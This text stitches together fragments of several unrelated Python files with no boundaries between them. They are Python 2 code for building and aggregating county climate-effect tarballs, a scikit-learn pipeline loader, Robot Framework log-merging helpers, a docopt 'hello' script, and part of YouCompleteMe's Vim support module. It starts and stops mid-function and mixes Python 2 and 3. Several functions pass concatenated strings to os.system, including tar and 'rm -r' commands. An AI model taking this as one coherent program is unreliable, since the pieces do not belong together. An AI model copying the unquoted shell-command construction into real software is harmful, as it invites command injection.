    with tarfile.open(filepath) as tar:
        for item in tar.getnames()[1:]:
            # Entries look like <dir>/<fips>.csv: take the file part and
            # strip the 4-character '.csv' suffix to recover the FIPS code.
            fips = item.split('/')[1][0:-4]
            print fips

            # Call make_generator with no data
            generator = make_generator(fips, None, None)
            if generator is None:
                continue

            # Construct the effect file
            write_effect_file(name, fips, generator, collabel)

    send_fips_complete(make_generator)

    # Generate the bundle tar (cwd is inside tempdir, so write to parent)
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def make_tar_ncdf(name, weather_ncdf, var, make_generator, targetdir=None, collabel="fraction"):
    """Constructs a tar of files for each county, describing yearly results.

    name: the name of the effect bundle.
    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetdir: path to a final destination for the bundle, or a
      function to take the data
    collabel: the label for the effect column
    """

    # If this is a function, we just start iterating (no files are written;
    # the callable receives each county's generator directly)
    if hasattr(targetdir, '__call__'):
        call_with_generator(name, weather_ncdf, var, make_generator, targetdir)
        return

    # Create the working directory
    tempdir = enter_local_tempdir()
    os.mkdir(name)

    # Helper function for calling write_effect_file with collabel
    def write_csv(name, fips, generator):
        write_effect_file(name, fips, generator, collabel)

    # Iterate through the data
    call_with_generator(name, weather_ncdf, var, make_generator, write_csv)

    # Create the effect bundle (cwd is inside tempdir, so write to parent)
    target = get_target_path(targetdir, name)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + name)

    # Remove the working directory
    exit_local_tempdir(tempdir)

def yield_given(name, yyyyddd, weather, make_generator):
    """Yields (as an iterator) rows of the result of applying make_generator to the given weather.

    name: the name of the effect bundle.
    yyyyddd: YYYYDDD formated date values.
    weather: a dictionary to call generator with {variable: data}.
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    """
    generator = make_generator(0, yyyyddd, weather)
    if generator is not None:
        # Pass every produced row straight through to the caller
        for row in generator:
            yield row

        # Signal the end of the counties
        send_fips_complete(make_generator)

def call_with_generator(name, weather_ncdf, var, make_generator, targetfunc):
    """Helper function for calling make_generator with each variable
    set.  In cases with multiple weather datasets, assumes all use the
    same clock (sequence of times) and geography (sequence of
    counties).

    name: the name of the effect bundle.
    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    make_generator(fips, times, daily): returns an iterator of (year, effect).
    targetfunc: function(name, fips, generator) to handle results
    """

    if isinstance(weather_ncdf, dict) and isinstance(var, list):
        # In this case, we generate a dictionary of variables
        weather = {}
        times = None # All input assumed to have same clock

        # Filter by the variables in var
        for variable in var:
            # Retrieve the netcdf object (rootgrp) and add to weather dict
            if isinstance(weather_ncdf[variable], str):
                # Open this up as a netCDF and read data into array
                rootgrp = Dataset(weather_ncdf[variable], 'r+', format='NETCDF4')
                weather[variable] = rootgrp.variables[variable][:,:]
            elif isinstance(weather_ncdf[variable], dict):
                # This is an {original, data, times} dictionary
                rootgrp = weather_ncdf[variable]['original']
                weather[variable] = weather_ncdf[variable]['data']
                if 'times' in weather_ncdf[variable]:
                    times = weather_ncdf[variable]['times']
            else:
                # This is already a netcdf object
                rootgrp = weather_ncdf[variable]
                weather[variable] = rootgrp.variables[variable][:,:]

            # Collect additional information from netcdf object
            # (re-assigned on each iteration: per the docstring, all datasets
            # are assumed to share the same counties/lats/lons/times)
            counties = rootgrp.variables['fips']
            lats = rootgrp.variables['lat']
            lons = rootgrp.variables['lon']
            if times is None:
                times = rootgrp.variables['time']
    else:
        # We just want a single variable (not a dictionary of them)
        # Retrieve the netcdf object (rootgrp) and add to weather dict
        if isinstance(weather_ncdf, str):
            # Open this up as a netCDF and read into array
            rootgrp = Dataset(weather_ncdf, 'r+', format='NETCDF4')
            weather = rootgrp.variables[var][:,:]
        elif isinstance(weather_ncdf, dict):
            # This is an {original, data, times} dictionary
            rootgrp = weather_ncdf['original']
            weather = weather_ncdf['data']
        else:
            # This is already a netcdf object
            rootgrp = weather_ncdf
            weather = rootgrp.variables[var][:,:]

        # Collect additional information from netcdf object
        counties = rootgrp.variables['fips']
        lats = rootgrp.variables['lat']
        lons = rootgrp.variables['lon']
        times = rootgrp.variables['time']

    # Loop through counties, calling make_generator with each
    for ii in range(len(counties)):
        fips = canonical_fips(counties[ii])
        print fips

        # Extract the weather just for this county
        # (single variable: a [time] column; dict: {variable: [time] column})
        if not isinstance(weather, dict):
            daily = weather[:,ii]
        else:
            daily = {}
            for variable in weather:
                daily[variable] = weather[variable][:,ii]

        # Call make_generator for this county
        generator = make_generator(fips, times, daily, lat=lats[ii], lon=lons[ii])
        if generator is None:
            continue

        # Call targetfunc with the result
        targetfunc(name, fips, generator)

    # Signal the end of the counties
    send_fips_complete(make_generator)

def make_tar_ncdf_profile(weather_ncdf, var, make_generator):
    """Like make_tar_ncdf, except that just goes through the motions,
    and only for 100 counties.  Results are printed rather than written
    to an effect bundle.

    weather_ncdf: str for one, or {variable: filename} for calling
      generator with {variable: data}.
    var: str for one, or [str] for calling generator with {variable: data}
    """

    # Open a single netCDF if only one filename passed in
    if isinstance(weather_ncdf, str):
        # Collect the necessary info
        rootgrp = Dataset(weather_ncdf, 'r+', format='NETCDF4')
        counties = rootgrp.variables['fips']
        lats = rootgrp.variables['lat']
        lons = rootgrp.variables['lon']
        times = rootgrp.variables['time']
        weather = rootgrp.variables[var][:,:]
    else:
        # Open all netCDF referenced in var
        # (counties/lats/lons/times keep the values from the last file opened;
        # all files are assumed to share the same layout)
        weather = {} # Construct a dictionary of [yyyyddd x county] arrays
        for variable in var:
            rootgrp = Dataset(weather_ncdf[variable], 'r+', format='NETCDF4')
            counties = rootgrp.variables['fips']
            lats = rootgrp.variables['lat']
            lons = rootgrp.variables['lon']
            times = rootgrp.variables['time']
            weather[variable] = rootgrp.variables[variable][:,:]

    # Just do 100 counties
    for ii in range(100):
        # Always using 5 digit fips
        fips = canonical_fips(counties[ii])
        print fips

        # Construct the input array for this county
        if not isinstance(weather, dict):
            daily = weather[:,ii]
        else:
            daily = {}
            for variable in weather:
                daily[variable] = weather[variable][:,ii]

        # Generate the generator
        generator = make_generator(fips, times, daily, lat=lats[ii], lon=lons[ii])
        if generator is None:
            continue

        # Just print out the results
        print "year", "fraction"

        for (year, effect) in generator:
            print year, effect

### Effect calculation functions

## make_generator functions

def load_tar_make_generator(targetdir, name, column=None):
    """Load existing data for additional calculations.
    targetdir: relative path to a directory of effect bundles.
    name: the effect name (so the effect bundle is at <targetdir>/<name>.tar.gz
    """

    # Extract the existing tar into a loader tempdir
    tempdir = enter_local_tempdir('loader-')
    os.system("tar -xzf " + os.path.join("..", targetdir, name + ".tar.gz"))
    exit_local_tempdir(tempdir, killit=False)

    def generate(fips, yyyyddd, temps, *args, **kw):
        # When all of the counties are done, kill the local dir
        if fips == FIPS_COMPLETE:
            print "Remove", tempdir
            # We might be in another tempdir-- check
            if os.path.exists(tempdir):
                kill_local_tempdir(tempdir)
            else:
                kill_local_tempdir(os.path.join('..', tempdir))
            return

        # Open up the effect for this bundle
        fipspath = os.path.join(tempdir, name, fips + ".csv")
        if not os.path.exists(fipspath):
            fipspath = os.path.join('..', fipspath)
            if not os.path.exists(fipspath):
                # If we can't find this, just return a single year with 0 effect
                print fipspath + " doesn't exist"
                yield (yyyyddd[0] / 1000, 0)
                raise StopIteration()

        with open(fipspath) as fp:
            reader = csv.reader(fp)
            reader.next() # ignore header

            # yield the same values that generated this effect file
            for row in reader:
                if column is None:
                    yield [int(row[0])] + map(float, row[1:])
                else:
                    yield (int(row[0]), float(row[column]))

    return generate

### Aggregation from counties to larger regions

def aggregate_tar(name, scale_dict=None, targetdir=None, collabel="fraction", get_region=None, report_all=False):
    """Aggregates results from counties to larger regions.

    name: the name of an impact, already constructed into an effect bundle
    scale_dict: a dictionary of weights, per county
    targetdir: directory holding both county bundle and to hold region bundle
    collabel: Label for result column(s)
    get_region: either None (uses first two digits of FIPS-- aggregates to state),
      True (combine all counties-- aggregate to national),
      or a function(fips) => code which aggregates each set of counties producing the same name
    report_all: if true, include a whole sequence of results; otherwise, just take first one

    The output bundle is written as <name>-<region_name>.tar.gz, with one
    csv per region holding the weighted average of its counties' results.
    """

    # Get a region name and a get_region function
    region_name = 'region' # final bundle will use this as a suffix

    if get_region is None: # aggregate to state
        get_region = lambda fips: fips[0:2]
        region_name = 'state'
    elif get_region is True: # aggregate to nation
        get_region = lambda fips: 'national'
        region_name = 'national'
    else:
        # get a title, if get_region returns one for dummy-fips "_title_"
        # NOTE(review): bare except is deliberate best-effort here -- a
        # get_region that rejects the dummy fips just keeps the default name.
        try:
            title = get_region('_title_')
            if title is not None:
                region_name = title
        except:
            pass

    regions = {} # {region code: {year: (numer, denom)}}
    # This is the effect bundle to aggregate
    target = get_target_path(targetdir, name)

    # Generate a temporary directory to extract county results
    tempdir = enter_local_tempdir()
    # Extract all of the results
    os.system("tar -xzf " + os.path.join("..", target) + ".tar.gz")

    # Go through all counties
    for filename in os.listdir(name):
        # If this is a county file (5-digit FIPS name)
        match = re.match(r'(\d{5})\.csv', filename)
        if match:
            code = match.groups(1)[0] # get the FIPS code

            # Check that it's in the scale_dict
            if scale_dict is not None and code not in scale_dict:
                continue

            # Check which region it is in
            region = get_region(code)
            if region is None:
                continue

            # Prepare the dictionary of results for this region, if necessary
            if region not in regions:
                regions[region] = {} # year => (numer, denom)

            # Get out the current dictionary of years
            years = regions[region]

            # Go through every year in this effect file
            with open(os.path.join(name, filename)) as csvfp:
                reader = csv.reader(csvfp, delimiter=',')
                reader.next()

                if report_all: # Report entire sequence of results
                    for row in reader:
                        # Get the numerator and denominator for this weighted sum
                        if row[0] not in years:
                            numer, denom = (np.array([0] * (len(row)-1)), 0)
                        else:
                            numer, denom = years[row[0]]

                        # Add on one more value to the weighted sum
                        # (unweighted -- weight 1 -- when no scale_dict given)
                        try:
                            numer = numer + np.array(map(float, row[1:])) * (scale_dict[code] if scale_dict is not None else 1)
                            denom = denom + (scale_dict[code] if scale_dict is not None else 1)
                        except Exception, e:
                            print e

                        # Put the weighted sum calculation back in for this year
                        years[row[0]] = (numer, denom)
                else: # Just report the first result
                    for row in reader:
                        # Get the numerator and denominator for this weighted sum
                        if row[0] not in years:
                            numer, denom = (0, 0)
                        else:
                            numer, denom = years[row[0]]

                        # Add on one more value to the weighted sum
                        numer = numer + float(row[1]) * (scale_dict[code] if scale_dict is not None else 1)
                        denom = denom + (scale_dict[code] if scale_dict is not None else 1)

                        # Put the weighted sum calculation back in for this year
                        years[row[0]] = (numer, denom)

    # Remove all county results from extracted tar
    os.system("rm -r " + name)

    # Start producing directory of region results
    dirregion = name + '-' + region_name
    if not os.path.exists(dirregion):
        os.mkdir(dirregion)

    # For each region that got a result
    for region in regions:
        # Create a new CSV effect file
        with open(os.path.join(dirregion, region + '.csv'), 'wb') as csvfp:
            writer = csv.writer(csvfp, quoting=csv.QUOTE_MINIMAL)
            # Include a header row
            if not isinstance(collabel, list):
                writer.writerow(["year", collabel])
            else:
                writer.writerow(["year"] + collabel)

            # Construct a sorted list of years from the keys of this region's dictionary
            years = map(str, sorted(map(int, regions[region].keys())))

            # For each year, output the weighted average
            for year in years:
                if regions[region][year][1] == 0: # the denom is 0-- never got a value
                    writer.writerow([year, 'NA'])
                else:
                    # Write out the year's result
                    if report_all:
                        writer.writerow([year] + list(regions[region][year][0] / float(regions[region][year][1])))
                    else:
                        writer.writerow([year, float(regions[region][year][0]) / regions[region][year][1]])

    # Construct the effect bundle
    target = get_target_path(targetdir, dirregion)
    os.system("tar -czf " + os.path.join("..", target) + ".tar.gz " + dirregion)

    # Clean up temporary directory
    exit_local_tempdir(tempdir)

from abc import ABC
import configargparse
from sklearn.externals import joblib
from termcolor import colored


class ScikitBase(ABC):
    """
    Base class for AI strategies backed by a scikit-learn model/pipeline.

    Command-line arguments:
        -p/--pipeline       path to the trained model/pipeline (*.pkl file), required
        -f/--feature_names  optional path to a pickled list of feature names
    """
    arg_parser = configargparse.get_argument_parser()
    arg_parser.add('-p', '--pipeline', help='trained model/pipeline (*.pkl file)', required=True)
    arg_parser.add('-f', '--feature_names', help='List of features list pipeline (*.pkl file)')
    pipeline = None

    def __init__(self):
        args = self.arg_parser.parse_known_args()[0]
        super(ScikitBase, self).__init__()
        self.pipeline = self.load_pipeline(args.pipeline)
        if args.feature_names:
            # Feature-name lists are persisted with joblib just like pipelines.
            self.feature_names = self.load_pipeline(args.feature_names)

    @staticmethod
    def load_pipeline(pipeline_file):
        """
        Load a pickled scikit model/pipeline from pipeline_file and return it.
        """
        print(colored('Loading pipeline: ' + pipeline_file, 'green'))
        # NOTE(review): sklearn.externals.joblib is deprecated (removed in
        # scikit-learn >= 0.23); the standalone ``joblib`` package is the
        # drop-in replacement -- confirm before upgrading scikit-learn.
        return joblib.load(pipeline_file)

    def fetch_pipeline_from_server(self):
        """
        Fetch the pipeline from server/cloud (not implemented yet).
        """
        # TODO
        pass

    def predict(self, df):
        """
        Return predictions from the model/pipeline for df, or None when the
        model rejects the input.
        """
        try:
            return self.pipeline.predict(df)
        except (ValueError, TypeError) as e:
            # Report the actual exception type and detail: the previous message
            # always claimed ValueError even when a TypeError was caught.
            print(colored('Got {} while using scikit model: {}'.format(type(e).__name__, e), 'red'))
            return None


import commandRunner as cr
import subprocess
import glob, os, platform, shutil, adb
from pathlib import Path


def combine_browsers_logs(udid):
    """Merge per-device Robot Framework browser logs into browserlogs/.

    Builds one ``rebot`` command covering every device's output.xml, runs it,
    then copies each device's screenshots up into browserlogs/ so the combined
    report can reference them.
    """
    cmd = 'rebot -N Combined --outputdir browserlogs/ '

    for device in udid:
        # Collect every device's output.xml for the combined report.
        # (Double backslashes: the old "\output.xml" relied on an invalid
        # escape sequence being preserved verbatim.)
        if platform.system() == "Windows":
            cmd += os.getcwd() + "\\browserlogs\\" + device + "\\output.xml "
        else:
            cmd += os.getcwd() + "/browserlogs/" + device + "/output.xml "

    cr.run_command(cmd)

    # Copy each device's screenshots next to the combined report by stripping
    # the per-device directory component from the destination path.
    # The old code's "remove moved" filter (`[p for p in pngs if not p]`) was
    # dead logic -- its condition is always False for a non-empty path, so it
    # merely emptied the accumulator; copying each file once is the net effect.
    sep = "\\" if platform.system() == "Windows" else "/"
    for device in udid:
        pngs = glob.glob(os.getcwd() + sep + "browserlogs" + sep + device + sep + "*.png")
        for p in pngs:
            shutil.copy(p, p.replace(device + sep, ""))

def combine_logs(udid):
    """Merge per-device Robot Framework logs into logs/.

    Runs ``rebot`` over every device's output.xml (per-device run directories
    are named ``<udid>_*``), then moves all screenshots from the run
    subdirectories up into logs/ so the combined report can find them.
    """
    cmd = 'rebot -N Combined --outputdir logs/ '

    for device in udid:
        # Collect every device's output.xml for the combined report.
        if platform.system() == "Windows":
            cmd += os.getcwd() + "\\logs\\" + device + "_" + "*\\output.xml "
        else:
            cmd += os.getcwd() + "/logs/" + device + "_" + "*/output.xml "

    cr.run_command(cmd)

    # Move screenshot images up into logs/. One pass suffices: the old code
    # repeated this identical pass once per device (the loop variable was
    # unused) with the is_file() check turning later passes into no-ops.
    # NOTE(review): without recursive=True, ** in glob matches a single
    # directory level only -- confirm run dirs are never nested deeper.
    if platform.system() == "Windows":
        for p in glob.glob(os.getcwd() + "\\logs\\**\\*.png"):
            if Path(p).is_file():  # skip anything already moved
                imgname = p[p.rindex('\\') + 1:]
                root = p[:p.rfind("\\logs\\")]
                shutil.move(p, root + "\\logs\\" + imgname)
    else:
        for p in glob.glob(os.getcwd() + "/logs/**/*.png"):
            if Path(p).is_file():  # skip anything already moved
                imgname = p[p.rindex('/') + 1:]
                root = p[:p.rfind("/logs/")]
                shutil.move(p, root + "/logs/" + imgname)

def zip_logs():
    """Archive the logs/ directory into a timestamped logs-*.zip file."""
    # Build the timestamp in Python: the previous "$(date +...)" form is bash
    # command substitution and is not expanded by PowerShell, so the Windows
    # branch produced a literally-named (or failing) archive.
    from datetime import datetime
    stamp = datetime.now().strftime("%Y-%m-%d-%H%M")

    if platform.system() == "Windows":
        cmd = "Compress-Archive logs logs-" + stamp + ".zip"
        subprocess.call(["powershell.exe", cmd])

    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr logs-" + stamp + ".zip logs/"
        cr.run_command(cmd)

def zip_browsers_logs():
    """Archive the browserlogs/ directory into a timestamped zip file."""
    # Build the timestamp in Python: the previous "$(date +...)" form is bash
    # command substitution and is not expanded by PowerShell on Windows.
    from datetime import datetime
    stamp = datetime.now().strftime("%Y-%m-%d-%H%M")

    if platform.system() == "Windows":
        cmd = "Compress-Archive browserlogs browserlogs-" + stamp + ".zip"
        subprocess.call(["powershell.exe", cmd])

    elif platform.system() == "Linux" or platform.system() == "Darwin":
        cmd = "zip -vr browserlogs-" + stamp + ".zip browserlogs/"
        cr.run_command(cmd)

def delete_previous_logs():
    """Remove everything under logs/ left over from a previous run."""
    cr.run_command('rm -rf logs/*')

def delete_previous_logs_browser():
    """Remove everything under browserlogs/ left over from a previous run."""
    cr.run_command('rm -rf browserlogs/*')
# Copyright (c) 2014 Stefano Palazzo <stefano.palazzo@gmail.com>

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

'''
hello

Usage:
    hello (--help | --version)

Options:
    --help -h      display this help message and exit
    --version      print version information and exit

'''

import sys
import docopt
import hello


def main(argv=sys.argv[1:]):
    """Parse command-line arguments and return a process exit status.

    Returns 2 on a usage error, 0 otherwise (--help/--version are signalled by
    docopt via SystemExit and also map to 0).

    NOTE(review): the default binds sys.argv at import time, not call time --
    fine for a CLI entry point, but worth knowing when testing.
    """
    try:
        docopt.docopt(__doc__, argv=argv, version=hello.__version__)
    except docopt.DocoptExit as e:
        print(str(e), file=sys.stderr)
        return 2
    except SystemExit:
        return 0
    # Explicit success status: previously control fell off the end and the
    # implicit None was passed to sys.exit() (which happens to mean success).
    return 0


# Script entry point: exit with the status code returned by main().
if __name__ == "__main__":  # pragma: no cover
    sys.exit(main())

# Copyright (C) 2011-2012 Google Inc.
#               2016      YouCompleteMe contributors
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import *  # noqa

from future.utils import iterkeys
import vim
import os
import json
import re
from collections import defaultdict
from ycmd.utils import ( ByteOffsetToCodepointOffset, GetCurrentDirectory,
                         JoinLinesAsUnicode, ToBytes, ToUnicode )
from ycmd import user_options_store

# Maps the user's 'goto_buffer_command' option values to the Vim commands used
# to open a jump target (see GetVimCommand below).
BUFFER_COMMAND_MAP = { 'same-buffer'      : 'edit',
                       'horizontal-split' : 'split',
                       'vertical-split'   : 'vsplit',
                       'new-tab'          : 'tabedit' }

# Confirmation prompt shown before a FixIt operation touches files that are
# not currently open (formatted with the number of files).
FIXIT_OPENING_BUFFERS_MESSAGE_FORMAT = (
    'The requested operation will apply changes to {0} files which are not '
    'currently open. This will therefore open {0} new files in the hidden '
    'buffers. The quickfix list can then be used to review the changes. No '
    'files will be written to disk. Do you wish to continue?' )

# Characters after which completion hints are still sensible even across
# whitespace (see CanComplete / SnappedLineAndColumn); stored as bytes for
# comparison against raw buffer contents.
potential_hint_triggers = list( map( ToBytes, [ '[', '(', ',', ':' ] ) )


def CanComplete():
  """Returns whether it's appropriate to provide any completion at the current
     line and column."""
  location = LineAndColumnAfterLastNonWhitespace()
  if location is None:
    # Nothing but whitespace precedes the caret anywhere in the buffer.
    return False
  if location == CurrentLineAndColumn():
    return True
  line, column = location
  last_char = ToBytes( vim.current.buffer[ line ][ column - 1 ] )
  return last_char in potential_hint_triggers


def SnappedLineAndColumn():
  """Will return CurrentLineAndColumn(), except when there's solely whitespace
     between caret and a potential hint trigger, where it "snaps to trigger",
     returning hint trigger's line and column instead."""
  location = LineAndColumnAfterLastNonWhitespace()
  if location is not None:
    line, column = location
    last_char = ToBytes( vim.current.buffer[ line ][ column - 1 ] )
    if last_char in potential_hint_triggers:
      return ( line, column )
  return CurrentLineAndColumn()


def LineAndColumnAfterLastNonWhitespace():
  """Scan upwards from the caret for the last non-whitespace character; return
  its 0-based (line, column-after), or None if only whitespace precedes the
  caret in the whole buffer."""
  line, column = CurrentLineAndColumn()
  stripped = vim.current.line[ :column ].rstrip()
  while not stripped:
    line -= 1
    if line < 0:
      return None
    stripped = vim.current.buffer[ line ].rstrip()
  return line, len( stripped )

# Message of the RuntimeError raised by SelectFromList when the user makes no
# valid choice.
NO_SELECTION_MADE_MSG = "No valid selection was made; aborting."

def CurrentLineAndColumn():
  """Returns the 0-based current line and 0-based current column."""
  # vim.current.window.cursor is a (1-based line, 0-based column) tuple; see
  # the comment in CurrentColumn for the full story. Normalize the line.
  row, col = vim.current.window.cursor
  return row - 1, col


def CurrentColumn():
  """Returns the 0-based current column. Do NOT access the CurrentColumn in
  vim.current.line. It doesn't exist yet when the cursor is at the end of the
  line. Only the chars before the current column exist in vim.current.line."""

  # vim's columns are 1-based while vim.current.line columns are 0-based
  # ... but vim.current.window.cursor (which returns a (line, column) tuple)
  # columns are 0-based, while the line from that same tuple is 1-based.
  # vim.buffers buffer objects OTOH have 0-based lines and columns.
  _, column = vim.current.window.cursor
  return column


def CurrentLineContents():
  """Return the current line as a unicode string."""
  current_line = vim.current.line
  return ToUnicode( current_line )


def CurrentLineContentsAndCodepointColumn():
  """Returns the line contents as a unicode string and the 0-based current
  column as a codepoint offset. If the current column is outside the line,
  returns the column position at the end of the line."""
  contents = CurrentLineContents()
  # ByteOffsetToCodepointOffset expects a 1-based offset, hence the +1/-1.
  codepoint_column = ByteOffsetToCodepointOffset( contents,
                                                  CurrentColumn() + 1 ) - 1
  return contents, codepoint_column


def TextAfterCursor():
  """Returns the text after CurrentColumn."""
  column = CurrentColumn()
  return ToUnicode( vim.current.line[ column: ] )


def TextBeforeCursor():
  """Returns the text before CurrentColumn."""
  column = CurrentColumn()
  return ToUnicode( vim.current.line[ :column ] )


# Note the difference between buffer OPTIONS and VARIABLES; the two are not
# the same.
def GetBufferOption( buffer_object, option ):
  """Return the value of Vim option |option| for the given buffer object."""
  # NOTE: We used to check for the 'options' property on the buffer_object which
  # is available in recent versions of Vim and would then use:
  #
  #   buffer_object.options[ option ]
  #
  # to read the value, BUT this caused annoying flickering when the
  # buffer_object was a hidden buffer (with option = 'ft'). This was all due to
  # a Vim bug. Until this is fixed, we won't use it.
  expr = 'getbufvar({0}, "&{1}")'.format( buffer_object.number, option )
  return GetVariableValue( expr )


def BufferModified( buffer_object ):
  """Return True if the buffer has unsaved modifications ('mod' option)."""
  modified = int( GetBufferOption( buffer_object, 'mod' ) )
  return modified != 0


def GetUnsavedAndSpecifiedBufferData( including_filepath ):
  """Build part of the request containing the contents and filetypes of all
  dirty buffers as well as the buffer with filepath |including_filepath|."""
  buffers_data = {}
  for buffer_object in vim.buffers:
    buffer_filepath = GetBufferFilepath( buffer_object )
    relevant = ( BufferModified( buffer_object ) or
                 buffer_filepath == including_filepath )
    if relevant:
      buffers_data[ buffer_filepath ] = {
        # Add a newline to match what gets saved to disk. See #1455 for details.
        'contents': JoinLinesAsUnicode( buffer_object ) + '\n',
        'filetypes': FiletypesForBuffer( buffer_object )
      }
  return buffers_data


def GetBufferNumberForFilename( filename, open_file_if_needed = True ):
  """Return the buffer number for |filename|; when |open_file_if_needed| is
  true, bufnr() is asked to create the buffer if it does not exist."""
  expr = u"bufnr('{0}', {1})".format(
      EscapeForVim( os.path.realpath( filename ) ),
      int( open_file_if_needed ) )
  return GetIntValue( expr )


def GetCurrentBufferFilepath():
  """Return the filepath associated with the active buffer."""
  current_buffer = vim.current.buffer
  return GetBufferFilepath( current_buffer )


def BufferIsVisible( buffer_number ):
  """Return True if |buffer_number| is valid and shown in some window."""
  if buffer_number < 0:
    return False
  return GetIntValue( "bufwinnr({0})".format( buffer_number ) ) != -1


def GetBufferFilepath( buffer_object ):
  """Return the buffer's file name; for a buffer without a name (e.g. one just
  created by :enew) build a path from the buffer number instead."""
  name = buffer_object.name
  if name:
    return name
  return os.path.join( GetCurrentDirectory(), str( buffer_object.number ) )


def GetCurrentBufferNumber():
  """Return the number of the active buffer."""
  current_buffer = vim.current.buffer
  return current_buffer.number


def GetBufferChangedTick( bufnr ):
  """Return the b:changedtick counter for buffer |bufnr|."""
  expr = 'getbufvar({0}, "changedtick")'.format( bufnr )
  return GetIntValue( expr )


def UnplaceSignInBuffer( buffer_number, sign_id ):
  """Remove sign |sign_id| from |buffer_number|, swallowing Vim's E158 error
  in case the buffer no longer exists."""
  if buffer_number < 0:
    return
  command = ( 'try | exec "sign unplace {0} buffer={1}" | '
              'catch /E158/ | endtry' ).format( sign_id, buffer_number )
  vim.command( command )


def PlaceSign( sign_id, line_num, buffer_num, is_error = True ):
  """Place a YcmError/YcmWarning sign at |line_num| in buffer |buffer_num|."""
  # libclang can give us diagnostics that point "outside" the file; Vim borks
  # on these.
  line_num = max( line_num, 1 )
  sign_name = 'YcmError' if is_error else 'YcmWarning'
  vim.command( 'sign place {0} name={1} line={2} buffer={3}'.format(
    sign_id, sign_name, line_num, buffer_num ) )


def ClearYcmSyntaxMatches():
  """Delete every highlight match previously added by YCM (group 'Ycm*')."""
  for match in VimExpressionToPythonType( 'getmatches()' ):
    if match[ 'group' ].startswith( 'Ycm' ):
      vim.eval( 'matchdelete({0})'.format( match[ 'id' ] ) )


def AddDiagnosticSyntaxMatch( line_num,
                              column_num,
                              line_end_num = None,
                              column_end_num = None,
                              is_error = True ):
  """Highlight a range in the current window starting from
  (|line_num|, |column_num|) included to (|line_end_num|, |column_end_num|)
  excluded. If |line_end_num| or |column_end_num| are not given, highlight the
  character at (|line_num|, |column_num|). Both line and column numbers are
  1-based. Return the ID of the newly added match."""
  group = 'YcmErrorSection' if is_error else 'YcmWarningSection'

  line_num, column_num = LineAndColumnNumbersClamped( line_num, column_num )

  if not line_end_num or not column_end_num:
    # Raw strings: \% and \_ are Vim regex atoms, not Python escapes. The
    # previous non-raw literals relied on Python preserving invalid escape
    # sequences, which raises DeprecationWarning/SyntaxWarning on modern
    # interpreters. The resulting runtime strings are unchanged.
    return GetIntValue(
      r"matchadd('{0}', '\%{1}l\%{2}c')".format( group, line_num, column_num ) )

  # -1 and then +1 to account for column end not included in the range.
  line_end_num, column_end_num = LineAndColumnNumbersClamped(
      line_end_num, column_end_num - 1 )
  column_end_num += 1

  return GetIntValue(
    r"matchadd('{0}', '\%{1}l\%{2}c\_.\{{-}}\%{3}l\%{4}c')".format(
      group, line_num, column_num, line_end_num, column_end_num ) )


# Clamps the line and column numbers so that they are not past the contents of
# the buffer. Numbers are 1-based byte offsets.
def LineAndColumnNumbersClamped( line_num, column_num ):
  """Clamp 1-based byte offsets |line_num| and |column_num| so they do not
  point past the contents of the current buffer."""
  buffer_lines = vim.current.buffer

  max_line = len( buffer_lines )
  if line_num and line_num > max_line:
    line_num = max_line

  max_column = len( buffer_lines[ line_num - 1 ] )
  if column_num and column_num > max_column:
    column_num = max_column

  return line_num, column_num


def SetLocationList( diagnostics ):
  """Populate the location list with diagnostics. Diagnostics should be in
  qflist format; see ":h setqflist" for details."""
  serialized = json.dumps( diagnostics )
  vim.eval( 'setloclist( 0, {0} )'.format( serialized ) )


def OpenLocationList( focus = False, autoclose = False ):
  """Open the location list to full width at the bottom of the screen with its
  height automatically set to fit all entries. This behavior can be overridden
  by using the YcmLocationOpened autocommand. When focus is set to True, the
  location list window becomes the active window. When autoclose is set to True,
  the location list window is automatically closed after an entry is
  selected."""
  # 'botright' forces a full-width window at the very bottom of the screen.
  vim.command( 'botright lopen' )

  SetFittingHeightForCurrentWindow()

  if autoclose:
    # This autocommand is automatically removed when the location list window is
    # closed.
    vim.command( 'au WinLeave <buffer> q' )

  if VariableExists( '#User#YcmLocationOpened' ):
    vim.command( 'doautocmd User YcmLocationOpened' )

  if not focus:
    # :lopen left the location list focused; give the user their window back.
    JumpToPreviousWindow()


def SetQuickFixList( quickfix_list ):
  """Populate the quickfix list and open it. List should be in qflist format:
  see ":h setqflist" for details."""
  serialized = json.dumps( quickfix_list )
  vim.eval( 'setqflist( {0} )'.format( serialized ) )


def OpenQuickFixList( focus = False, autoclose = False ):
  """Open the quickfix list to full width at the bottom of the screen with its
  height automatically set to fit all entries. This behavior can be overridden
  by using the YcmQuickFixOpened autocommand.
  See the OpenLocationList function for the focus and autoclose options."""
  # 'botright' forces a full-width window at the very bottom of the screen.
  vim.command( 'botright copen' )

  SetFittingHeightForCurrentWindow()

  if autoclose:
    # This autocommand is automatically removed when the quickfix window is
    # closed.
    vim.command( 'au WinLeave <buffer> q' )

  if VariableExists( '#User#YcmQuickFixOpened' ):
